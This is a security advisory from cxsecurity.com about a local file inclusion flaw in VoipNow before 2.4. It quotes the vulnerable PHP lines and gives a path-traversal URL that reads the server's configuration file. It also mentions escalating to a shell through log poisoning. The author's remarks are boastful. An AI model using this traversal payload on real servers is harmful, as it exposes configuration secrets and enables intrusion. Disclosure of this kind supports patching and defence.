Voipnow => 2.4 Local File Inclusion Vulnerability

2013-04-21 / 2013-04-22
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

/* + Application : Voipnow | Version , Prior to 2.4 | Download : http://4psa.com/ | By Faris , AKA i-Hmx | n0p1337@gmail.com + sec4ever.com , 1337s.cc */ VoipNow is commercial web GUI voip server manager, it's affected by local file inclusion vuln File : /usr/local/voipnow/admin/htdocs/help/index.php Line 832 if ( !( isset( $_GET['screen'] ) && trim( $_GET['screen'] ) != "" ) ) { exit( ); } Line 872 require( $help_path.trim( $_GET['screen'] ) ); Example : https://target/help/index.php?screen=../../../../../../../../etc/voipnow/voipnow.conf can be exploited to gain shell access to the server via infecting Logs which located at /usr/local/voipnow/admin/logs/access.log NP : Sorry Guys for the time you wasted tracing my Elastix Logs ;) But The 0day Remain 0day till i decide to dislose it by my own xD and again Enjoy the song : http://www.youtube.com/watch?v=d-ELnDPmI8w keep in Your skiddy minds , "I Ain't Mad At Cha" < Faris , The Awsome xD >

References:

http://4psa.com/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top